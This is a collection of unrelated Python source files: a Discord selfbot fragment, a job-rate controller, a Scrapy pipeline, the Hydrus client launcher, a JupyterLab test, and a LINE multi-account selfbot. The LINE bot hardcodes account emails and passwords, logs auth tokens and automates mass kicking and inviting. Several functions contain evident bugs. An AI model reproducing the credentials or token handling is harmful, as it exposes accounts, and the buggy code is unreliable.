embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Listening Status ]
Status changed to: Listening to {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="watching", description="Set a watching status.", usage="watching [text]")
async def watching(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await BetterGhost.change_presence(activity=discord.Activity(type=3, name=f"{text}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Watching Status", description=f"Status changed to: Watching {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Watching Status ]
Status changed to: Watching {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="clearstatus", description="Clear your status.", usage="clearstatus")
async def clearstatus(ctx):
await BetterGhost.change_presence(activity=discord.Activity(type=-1), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Status Cleared", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send("Status Cleared")
@BetterGhost.command(name="nickname", description="Set your nickname to anything.", usage="nickname [text]")
async def nickname(ctx, *, text):
await ctx.author.edit(nick=nickname)
if __embedmode__:
embed = discord.Embed(title=f"Nickname changed to {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Nickname changed to {text}")
print(fg.cWhite + "")
@BetterGhost.command(name="clearnickname", description="Clear your nickname.", usage="clearnickname")
async def clearnickname(ctx):
await ctx.author.edit(nick="")
if __embedmode__:
embed = discord.Embed(title=f"Nickname cleared", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Nickname cleared")
BetterGhost.run(__token__)
# BetterGhostDiscum = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# @BetterGhostDiscum.gateway.command
# def discumevents(resp):
# if resp.event.typing:
# rawevent = resp.raw
# parsedevent = resp.parsed.auto()
# print(rawevent)
# BetterGhostDiscum.gateway.run()
except Exception as e:
if "improper token" in str(e).lower():
print("The Discord token that BetterGhost has been given to use is no longer working or is invalid.")
print("Please put a new token in to the config (config.json).")
else:
print(e)
logging.exception(str(e))
if os.name == "nt":
os.system("pause")
if os.name == "posix":
input("Press enter to close . . .")
|
delay_control.py | import threading, time, queue, collections
from debug_utils import *
class InterJobGenTimeController_ExpAvg_AIMD():
def __init__(self, _id, max_delay, fc_client):
self._id = _id
self.max_delay = max_delay
self.fc_client = fc_client
self.q_len_limit = 2
self.q_len = 0
self.q_len_max = 2
self.avg_delay = 0
self.a = 0.5
self.put() # to put the initial token in sid_q
def update_common(self, t): # t: turnaround time
self.q_len = max(0, self.q_len - 1)
if self.avg_delay == 0:
self.avg_delay = t
else:
self.avg_delay = (1 - self.a)*self.avg_delay + self.a*t
if self.avg_delay > self.max_delay:
self.q_len_limit = self.q_len_limit*1/2
log(WARNING, "reduced q_len_limit; id= {}".format(self._id))
else:
if self.q_len_limit < 2*self.q_len_max:
self.q_len_limit += 1/self.q_len_limit if self.q_len_limit > 1 else 1
log(WARNING, "inced q_len_limit; id= {}".format(self._id))
log(DEBUG, "id= {}".format(self._id), avg_delay=self.avg_delay, max_delay=self.max_delay, q_len_limit=self.q_len_limit, q_len=self.q_len)
def update_w_result(self, t):
self.update_common(t)
if self.q_len == 0 or (self.q_len < self.q_len_limit):
self.put()
elif self.q_len_limit == 0:
self.fc_client.send_probe(sid)
def update_w_probe(self, t):
self.update_common(t)
def put(self):
self.fc_client.put_sid(self._id)
self.q_len += 1
self.q_len_max = max(self.q_len_max, self.q_len)
class InterJobGenTimeController_ExpAvg():
def __init__(self, _id, fc_client_sid_q):
self._id = _id
self.fc_client_sid_q = fc_client_sid_q
self.inter_serv_time = None
self.a = 0.5
self.num_jobs_on_fly = 0
self.on = True
t = threading.Thread(target=self.run, daemon=True)
t.start()
self.put()
def close(self):
log(DEBUG, "started")
self.on = False
log(DEBUG, "done")
def run(self):
while self.on:
if self.inter_serv_time is None and self.num_jobs_on_fly > 4:
# time.sleep(1)
time.sleep(0.1)
else:
# time.sleep(2)
time.sleep(self.inter_serv_time)
self.put()
def update_w_result(self, job_serv_time):
log(DEBUG, "started", job_serv_time=job_serv_time)
self.num_jobs_on_fly -= 1
if self.inter_serv_time is None:
self.inter_serv_time = job_serv_time
else:
self.inter_serv_time = self.a*job_serv_time + (1 - self.a)*self.inter_serv_time
log(DEBUG, "done", inter_serv_time=self.inter_serv_time, num_jobs_on_fly=self.num_jobs_on_fly)
def put(self):
self.num_jobs_on_fly += 1
self.fc_client_sid_q.put(self._id)
class InterJobGenTimeController_GGn():
def __init__(self, sid, fc_client_sid_q, avg_load_target):
self.sid = sid
self.fc_client_sid_q = fc_client_sid_q
self.avg_load_target = avg_load_target
self.inter_req_time = None
self.result_q = collections.deque(maxlen=100)
self.cum_serv_time = 0
self.on = True
self.syncer = queue.Queue()
t = threading.Thread(target=self.run, daemon=True)
t.start()
def __repr__(self):
return "InterJobGenTimeController_GGn(sid= {}, avg_load_target= {})".format(self.sid, self.avg_load_target)
def close(self):
log(DEBUG, "started")
self.on = False
log(DEBUG, "done")
def update(self, result):
log(DEBUG, "started", inter_req_time=self.inter_req_time, serv_time=result.serv_time)
self.cum_serv_time += result.serv_time
if len(self.result_q) == self.result_q.maxlen:
self.cum_serv_time -= self.result_q[0].serv_time
self.result_q.append(result)
should_sync = self.inter_req_time is None
self.inter_req_time = self.cum_serv_time / len(self.result_q) / result.num_server_fair_share / self.avg_load_target
if should_sync:
log(DEBUG, "recved first result")
self.syncer.put(1)
log(DEBUG, "done", inter_req_time=self.inter_req_time)
def run(self):
log(DEBUG, "started", what=self)
while self.on:
if self.inter_req_time is None:
log(DEBUG, "putting first sid", sid=self.sid)
self.fc_client_sid_q.put(self.sid)
log(DEBUG, "waiting for first result", sid=self.sid)
self.syncer.get(block=True)
self.fc_client_sid_q.put(self.sid)
else:
log(DEBUG, "waiting", inter_req_time=self.inter_req_time, sid=self.sid)
time.sleep(self.inter_req_time)
self.fc_client_sid_q.put(self.sid)
|
pipelines.py | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import threading
import pymongo
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
from spider.items import DoubanItem, DoubanDetailsItem
from spider.spiders.douban import DoubanSpider
from spider_utils.douban_database import douban_db
class DoubanPipeline:
def process_item(self, item, spider: DoubanSpider):
spider.logger.info(f"Got book item: {item.get('title', item.get('douban_id'))}")
def update_item(item_):
try:
spider.logger.info(f"saving {item_.__class__.__name__} {item_.get('douban_id')}")
except Exception as e:
spider.logger.warning(f"{e.__class__.__name__} {e}")
if isinstance(item_, DoubanItem):
douban_db.update_item(item_)
elif isinstance(item_, DoubanDetailsItem):
douban_db.update_details(details=item_)
threading.Thread(target=update_item, args=(item,), daemon=True).start()
return item
|
threading_test.py | import threading
def worker1():
for x in range(1,20000):
print('1: ' + str(x))
def worker2():
for x in range(1,20000):
print('2: ' + str(x))
t1 = threading.Thread(target=worker1)
t2 = threading.Thread(target=worker2)
t1.start()
t2.start() |
hydrus_client.py | #!/usr/bin/env python3
# Hydrus is released under WTFPL
# You just DO WHAT THE FUCK YOU WANT TO.
# https://github.com/sirkris/WTFPL/blob/master/WTFPL.md
import locale
try: locale.setlocale( locale.LC_ALL, '' )
except: pass
try:
import os
import argparse
import sys
from hydrus.core import HydrusBoot
HydrusBoot.AddBaseDirToEnvPath()
# initialise Qt here, important it is done early
from hydrus.client.gui import QtPorting as QP
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusLogger
from hydrus.core import HydrusPaths
from hydrus.core import HydrusTemp
argparser = argparse.ArgumentParser( description = 'hydrus network client' )
argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
argparser.add_argument( '--temp_dir', help = 'override the program\'s temporary directory' )
argparser.add_argument( '--db_journal_mode', default = 'WAL', choices = [ 'WAL', 'TRUNCATE', 'PERSIST', 'MEMORY' ], help = 'change db journal mode (default=WAL)' )
argparser.add_argument( '--db_cache_size', type = int, help = 'override SQLite cache_size per db file, in MB (default=256)' )
argparser.add_argument( '--db_transaction_commit_period', type = int, help = 'override how often (in seconds) database changes are saved to disk (default=30,min=10)' )
argparser.add_argument( '--db_synchronous_override', type = int, choices = range(4), help = 'override SQLite Synchronous PRAGMA (default=2)' )
argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run db temp operations entirely in memory' )
argparser.add_argument( '--boot_debug', action='store_true', help = 'print additional bootup information to the log' )
argparser.add_argument( '--no_wal', action='store_true', help = 'OBSOLETE: run using TRUNCATE db journaling' )
argparser.add_argument( '--db_memory_journaling', action='store_true', help = 'OBSOLETE: run using MEMORY db journaling (DANGEROUS)' )
argparser.add_argument( '--address', metavar='addr', type=str, default="", help='websocket api listening address' )
argparser.add_argument( '--port', metavar='num', type=int, default=47341, help='websocket api listening port' )
argparser.add_argument( '--certfile', metavar='file', type=str, default=None, help='websocket api SSL cert file' )
argparser.add_argument( '--keyfile', metavar='file', type=str, default=None, help='websocket api SSL key file' )
argparser.add_argument( '--access-key', metavar='key', type=str, default=None, help='websocket api access key' )
result = argparser.parse_args()
HG.args = result
if result.db_dir is None:
db_dir = HC.DEFAULT_DB_DIR
if not HydrusPaths.DirectoryIsWriteable( db_dir ) or HC.RUNNING_FROM_MACOS_APP:
if HC.USERPATH_DB_DIR is None:
raise Exception( 'The default db path "{}" was not writeable, and the userpath could not be determined!'.format( HC.DEFAULT_DB_DIR ) )
db_dir = HC.USERPATH_DB_DIR
else:
db_dir = result.db_dir
db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )
if not HydrusPaths.DirectoryIsWriteable( db_dir ):
raise Exception( 'The given db path "{}" is not a writeable-to!'.format( db_dir ) )
try:
HydrusPaths.MakeSureDirectoryExists( db_dir )
except:
raise Exception( 'Could not ensure db path "{}" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) )
if not os.path.isdir( db_dir ):
raise Exception( 'The given db path "{}" is not a directory!'.format( db_dir ) )
HG.db_journal_mode = result.db_journal_mode
if result.no_wal:
HG.db_journal_mode = 'TRUNCATE'
if result.db_memory_journaling:
HG.db_journal_mode = 'MEMORY'
if result.db_cache_size is not None:
HG.db_cache_size = result.db_cache_size
else:
HG.db_cache_size = 256
if result.db_transaction_commit_period is not None:
HG.db_transaction_commit_period = max( 10, result.db_transaction_commit_period )
else:
HG.db_transaction_commit_period = 30
if result.db_synchronous_override is not None:
HG.db_synchronous = int( result.db_synchronous_override )
else:
if HG.db_journal_mode == 'WAL':
HG.db_synchronous = 1
else:
HG.db_synchronous = 2
HG.no_db_temp_files = result.no_db_temp_files
HG.boot_debug = result.boot_debug
try:
from twisted.internet import reactor
except:
HG.twisted_is_broke = True
except Exception as e:
try:
HydrusData.DebugPrint( 'Critical boot error occurred! Details written to crash.log!' )
HydrusData.PrintException( e )
except:
pass
import traceback
error_trace = traceback.format_exc()
print( error_trace )
if 'db_dir' in locals() and os.path.exists( db_dir ):
emergency_dir = db_dir
else:
emergency_dir = os.path.expanduser( '~' )
possible_desktop = os.path.join( emergency_dir, 'Desktop' )
if os.path.exists( possible_desktop ) and os.path.isdir( possible_desktop ):
emergency_dir = possible_desktop
dest_path = os.path.join( emergency_dir, 'hydrus_crash.log' )
with open( dest_path, 'w', encoding = 'utf-8' ) as f:
f.write( error_trace )
print( 'Critical boot error occurred! Details written to hydrus_crash.log in either db dir or user dir!' )
sys.exit( 1 )
def boot():
if result.temp_dir is not None:
HydrusTemp.SetEnvTempDir( result.temp_dir )
controller = None
with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:
try:
HydrusData.Print( 'hydrus client started' )
if not HG.twisted_is_broke:
import threading
threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()
from hydrus.client import ClientController
controller = ClientController.Controller( db_dir )
controller.Run()
except:
HydrusData.Print( 'hydrus client failed' )
import traceback
HydrusData.Print( traceback.format_exc() )
finally:
HG.started_shutdown = True
HG.view_shutdown = True
HG.model_shutdown = True
if controller is not None:
controller.pubimmediate( 'wake_daemons' )
if not HG.twisted_is_broke:
reactor.callFromThread( reactor.stop )
HydrusData.Print( 'hydrus client shut down' )
HG.shutdown_complete = True
if HG.restart:
HydrusData.RestartProcess()
|
test_build_api.py | """Test the kernels service API."""
import threading
from ipython_genutils.tempdir import TemporaryDirectory
from ipython_genutils import py3compat
from jupyterlab.labapp import LabApp
from jupyterlab_launcher.tests.utils import APITester, LabTestBase
from notebook.tests.launchnotebook import assert_http_error
class BuildAPITester(APITester):
"""Wrapper for build REST API requests"""
url = 'lab/api/build'
def getStatus(self):
return self._req('GET', '')
def build(self):
return self._req('POST', '')
def clear(self):
return self._req('DELETE', '')
class BuildAPITest(LabTestBase):
"""Test the build web service API"""
Application = LabApp
def tempdir(self):
td = TemporaryDirectory()
self.tempdirs.append(td)
return py3compat.cast_unicode(td.name)
def setUp(self):
# Any TemporaryDirectory objects appended to this list will be cleaned
# up at the end of the test run.
self.tempdirs = []
@self.addCleanup
def cleanup_tempdirs():
for d in self.tempdirs:
d.cleanup()
self.build_api = BuildAPITester(self.request)
def test_get_status(self):
"""Make sure there are no kernels running at the start"""
resp = self.build_api.getStatus().json()
assert 'status' in resp
assert 'message' in resp
def test_build(self):
resp = self.build_api.build()
assert resp.status_code == 200
def test_clear(self):
with assert_http_error(500):
self.build_api.clear()
def build_thread():
with assert_http_error(500):
self.build_api.build()
t1 = threading.Thread(target=build_thread)
t1.start()
while 1:
resp = self.build_api.getStatus().json()
if resp['status'] == 'building':
break
resp = self.build_api.clear()
assert resp.status_code == 204
|
mobZpro.py | '''
┏━━━━━━━━━━━━━━━━━
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍].
┗━━━━━━━━━━━━━━━━━
'''
from linepy import *
from liff.ttypes import LiffChatContext, LiffContext, LiffSquareChatContext, LiffNoneContext, LiffViewRequest
from thrift import transport, protocol, server
from akad.ttypes import *
from akad.ttypes import Message
from akad.ttypes import ContentType as Type
from akad.ttypes import TalkException
from akad.ttypes import IdentityProvider, LoginResultType, LoginRequest, LoginType
from akad.ttypes import ChatRoomAnnouncementContents
from akad.ttypes import Location
from akad.ttypes import ChatRoomAnnouncement
from multiprocessing import Pool, Process
from thrift.Thrift import *
from thrift.unverting import *
from thrift.TMultiplexedProcessor import *
from thrift.TSerialization import *
from thrift.TRecursive import *
from thrift import transport, protocol, server
from thrift.protocol import TCompactProtocol, TMultiplexedProtocol, TProtocol
from thrift.transport import TTransport, TSocket, THttpClient, TZlibTransport
from time import sleep
import pytz, datetime, time, timeit, livejson,asyncio, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, ctypes, urllib, traceback, tempfile, platform
from humanfriendly import format_timespan, format_size, format_number, format_length
from datetime import timedelta, date
from datetime import datetime
from threading import Thread, activeCount
# 𐀀[x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍] _______________________________________________________
_session = requests.session()
try:
import urllib.request as urllib2
except ImportError:
import urllib2
programStart = time.time()
a001 = LINE('rvrndis@gmail.com','36091vwz')
print('》》》》UNIT 001 READY《《《《')
a002 = LINE('slynq1@gmail.com','36091vwz')
print('》》》》UNIT 002 READY《《《《')
a003 = LINE('slynq2@gmail.com','36091vwz')
print('》》》》UNIT 003 READY《《《《\n')
a001.log("[ M001D23 ]\n" + str(a001.authToken))
a002.log("[ M002D23 ]\n" + str(a002.authToken))
a003.log("[ M003D23 ]\n" + str(a003.authToken))
print('\n━━━━━━━━━━━━━━━━━━━━━━━━━━━')
print('\n██████╗░██████╗░███████╗██╗\n██╔══██╗██╔══██╗██╔════╝██║\n██║░░██║██████╔╝█████╗░░██║\n██║░░██║██╔══██╗██╔══╝░░╚═╝\n██████╔╝██║░░██║███████╗██╗\n╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝')
print('\n》》》》PROGRAM STARTED《《《《\n')
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
M001D23 = a001.getProfile().mid
M002D23 = a002.getProfile().mid
M003D23 = a003.getProfile().mid
army = [a001,a002]
antijs = [a003]
oepoll = OEPoll(a001)
call = a001
loop = asyncio.get_event_loop()
status = livejson.File('status.json', True, False, 4)
with open("settings.json","r",encoding="utf-8") as fp:
settings = json.load(fp)
creator = status["creator"]
owner = status["owner"]
admin = status["admin"]
staff = status["staff"]
mybots = status["mybots"]
blacklist = status["blacklist"]
promax = status["promax"]
strictmode = status["strictmode"]
Bots = [M001D23,M002D23,M003D23]
Botslist = [a001,a002,a003]
resp1 = a001.getProfile().displayName
resp2 = a002.getProfile().displayName
resp3 = a003.getProfile().displayName
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
helpCmd = '''
┣━━━━ 𐀀
┣ Protection
┣ Group
┣ Access
┣ Option
┣ Settings
┣ Reboot/Shutdown
┣━━━━ ©2020 ᴍᴏ-ʙᴀɴᴢᴜ
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
proCmd = '''
┣━━━━ Protection
┣ Kick/Invite [ Mention ]
┣ Protect [ Max/None ]
┣ Strictmode [ On/Off ]
┣ Protectlist
┣ Checkbot
┣ Purge
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
groupCmd = '''
┣━━━━ Group
┣ Ginfo
┣ Join
┣ Leave/Leave 1-3
┣ Invto [ Num ]
┣ Grouplist 1-3
┣ Mention/Tagall
┣ Memberlist/Pendinglist
┣ Openqr/Closeqr
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
accessCmd = '''
┣━━━━ Access
┣ Blacklist/Banlist
┣ Clearban
┣ Abort/Eject
┣ Squad List
┣ View Bots/Access
┣ Add/Del Owner [ Mention ]
┣ Add/Del Admin [ Mention ]
┣ Add/Del Staff [ Mention ]
┣ Add/Del Squad [ Mention ]
┣ Add/Del Ban [ Mention ]
┣ Owner:Recruit/Expel
┣ Admin:Recruit/Expel
┣ Staff:Recruit/Expel
┣ Squad:Add/Del
┣ Ban:Add/Del
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
optCmd ='''
┣━━━━ Option
┣ Allowliff
┣ Creator
┣ Respon/Ping
┣ Speed/Debug
┣ Me/About
┣ Mid/Mid [ Mention ]
┣ Contact [ Mention ]
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
setCmd = '''
┣━━━━ Settings
┣ Changepict:1-3/All
┣ Changebio:1-3/All [ Bio ]
┣ Changename:1-3/All [ Name ]
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
aboutCmd ='''┏━━━━━━━━━━━┓ ▕ [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]
┃▏╰━╮┏┈┓╭━╯▕┃ ▕ Protect Bot
┃▏═━┈┫𐀀┣┈━═▕┃ ▕ v5.4.4
┃▏╭━╯┗┈┛╰━╮▕┃ ▕
┗━━━━━━━━━━━┛ ▕ '''
dreX53 = '''██████╗░██████╗░███████╗██╗
██╔══██╗██╔══██╗██╔════╝██║
██║░░██║██████╔╝█████╗░░██║
██║░░██║██╔══██╗██╔══╝░░╚═╝
██████╔╝██║░░██║███████╗██╗
╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝'''
#[x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]. _______________________________________________________
for hlth in Botslist:
for xdrex in Bots:
try:
hlth.findAndAddContactsByMid(xdrex)
except:
pass
def backupData():
try:
backup = settings
f = codecs.open('settings.json','w','utf-8')
json.dump(backup, f, sort_keys=True, indent=4, ensure_ascii=False)
return True
except:
pass
def restartProgram():
print('\n》》》》PROGRAM RESTARTED《《《《\n')
backupData()
python = sys.executable
os.execl(python, python, *sys.argv)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours,24)
weeks, days = divmod(days,7)
months, weeks = divmod(weeks,4)
text = ""
if months != 0: text += "%02d Months" % (months)
if weeks != 0: text += " %02d Weeks" % (weeks)
if days != 0: text += " %02d Days" % (days)
if hours != 0: text += " %02d Hours" % (hours)
if mins != 0: text += " %02d Minutes" % (mins)
if secs != 0: text += " %02d Seconds" % (secs)
if text[0] == " ":
text = text[1:]
return text
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def logError(text):
a001.log("[ ERROR ] {}".format(str(text)))
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.now(tz=tz)
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
time = "{}, {} - {} - {} | {}".format(str(hasil), str(inihari.strftime('%d')), str(bln), str(inihari.strftime('%Y')), str(inihari.strftime('%H:%M:%S')))
with open("logError.txt","a") as error:
error.write("\n[ {} ] {}".format(str(time), text))
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def sendMention(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@dreMention"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
a001.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def sendTemplate(group, data):
xyz = LiffChatContext(group)
xyzz = LiffContext(chat=xyz)
view = LiffViewRequest('1602687308-GXq4Vvk9', xyzz)
token1 = a001.liff.issueLiffView(view)
url = 'https://api.line.me/message/v3/share'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % token.accessToken
}
data = {"messages":[data]}
requests.post(url, headers=headers, data=json.dumps(data))
def sendTemplate(to, data):
xyz = LiffChatContext(to)
xyzz = LiffContext(chat=xyz)
view = LiffViewRequest('1602687308-GXq4Vvk9', xyzz)
token = a001.liff.issueLiffView(view)
url = 'https://api.line.me/message/v3/share'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % token.accessToken
}
data = {"messages":[data]}
requests.post(url, headers=headers, data=json.dumps(data))
def allowLiff():
url = 'https://access.line.me/dialog/api/permissions'
data = {
'on': [
'P',
'CM'
],
'off': []
}
headers = {
'X-Line-Access': a001.authToken,
'X-Line-Application': a001.server.APP_NAME,
'X-Line-ChannelId': '1602687308',
'Content-Type': 'application/json'
}
requests.post(url, json=data, headers=headers)
def sendFooter(receiver, text):
label = settings["label"]
icon = settings["iconUrl"]
link = settings["linkUrl"]
data = {
"type": "text",
"text": text,
"sentBy": {
"label": "{}".format(label),
"iconUrl": "{}".format(icon),
"linkUrl": "{}".format(link)
}
}
sendTemplate(receiver, data)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def kick(group, target):
try:
asd = a001.kickoutFromGroup(group, [target])
if asd != None:
hlthfail
except:
try:
asd = a002.kickoutFromGroup(group, [target])
if asd != None:
hlthfail
except:
pass
def cancel(group, target):
try:
asd = a001.cancelGroupInvitation(group, [target])
if asd != None:
hlthfail
except:
try:
asd = a002.cancelGroupInvitation(group, [target])
if asd != None:
hlthfail
except:
pass
def invite(group, target):
try:
a001.findAndAddContactsByMid(target)
asd = a001.inviteIntoGroup(group, [target])
if asd != None:
hlthfail
except:
try:
a002.findAndAddContactsByMid(target)
asd = a002.inviteIntoGroup(group, [target])
if asd != None:
hlthfail
except:
pass
def lockqr(group):
try:
G = a001.getGroup(group)
G.preventedJoinByTicket = True
asd = a001.updateGroup(G)
if asd != None:
hlthfail
except:
try:
G = a002.getGroup(group)
G.preventedJoinByTicket = True
asd = a002.updateGroup(G)
if asd != None:
hlthfail
except:
pass
def join(group):
try:
a001.acceptGroupInvitation(group)
except:
try:
a002.acceptGroupInvitation(group)
except:
pass
def reject(group):
try:
a001.rejectGroupInvitation(group)
except:
try:
a002.rejectGroupInvitation(group)
except:
pass
def backup(group, target):
try:
a001.inviteIntoGroup(group, [target])
if target == M002D23:
a002.acceptGroupInvitation(group)
except:
try:
a002.inviteIntoGroup(group, [target])
if target == M001D23:
a001.acceptGroupInvitation(group)
except:
pass
def antijs(group, target):
a003.acceptGroupInvitation(group)
a003.kickoutFromGroup(group, [target])
try:
a003.inviteIntoGroup(group, [M001D23,M002D23])
a001.acceptGroupInvitation(group)
a002.acceptGroupInvitation(group)
time.sleep(3)
a003.leaveGroup(group)
except:
pass
def blacklist(target):
try:
if target in creator or target in owner or target in admin or target in staff or target in mybots or target in Bots:
pass
else:
if target in status["blacklist"]:
pass
else:
status["blacklist"].append(target)
except:
pass
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def logspeed():
get_profile_time_start = time.time()
get_profile = a001.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_profile_took = time.time() - get_profile_time_start
return "[ Bots Speed ]\n- Took: %.3fms\n- Taken: %.5f" % (get_profile_took,get_profile_time)
get_profile_time_start = time.time()
get_profile = a002.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_profile_took = time.time() - get_profile_time_start
return "[ Bots Speed ]\n- Took: %.3fms\n- Taken: %.5f" % (get_profile_took,get_profile_time)
get_profile_time_start = time.time()
get_profile = a003.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_profile_took = time.time() - get_profile_time_start
return "[ Bots Speed ]\n- Took: %.3fms\n- Taken: %.5f" % (get_profile_took,get_profile_time)
def debug():
get_profile_time_start = time.time()
get_profile = a001.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = a001.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = a001.getContact(get_profile.mid)
get_contact_time = time.time() - get_contact_time_start
elapsed_time = time.time() - get_profile_time_start
return "[ Debug ]\n- Send Respon: %.5f\n- Get Profile: %.5f\n- Get Contact: %.5f\n- Get Group: %.5f" % (elapsed_time,get_profile_time,get_contact_time,get_group_time)
get_profile_time_start = time.time()
get_profile = a002.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = a002.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = a002.getContact(get_profile.mid)
get_contact_time = time.time() - get_contact_time_start
elapsed_time = time.time() - get_profile_time_start
return "[ Debug ]\n- Send Respon: %.5f\n- Get Profile: %.5f\n- Get Contact: %.5f\n- Get Group: %.5f" % (elapsed_time,get_profile_time,get_contact_time,get_group_time)
get_profile_time_start = time.time()
get_profile = a003.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = a003.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = a003.getContact(get_profile.mid)
get_contact_time = time.time() - get_contact_time_start
elapsed_time = time.time() - get_profile_time_start
return "[ Debug ]\n- Send Respon: %.5f\n- Get Profile: %.5f\n- Get Contact: %.5f\n- Get Group: %.5f" % (elapsed_time,get_profile_time,get_contact_time,get_group_time)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def command(text):
xmobz = text.lower()
if settings['setKey']['status']:
if xmobz.startswith(settings['setKey']['key']):
cmd = xmobz.replace(settings['setKey']['key'],'')
else:
cmd = 'Undefined command'
else:
cmd = text.lower()
return cmd
def removeCmd(text, key=''):
if key == '':
setKey = '' if not settings['setKey']['status'] else settings['setKey']['key']
else:
setKey = key
text_ = text[len(setKey):]
sep = text_.split(' ')
return text_[len(sep[0] + ' '):]
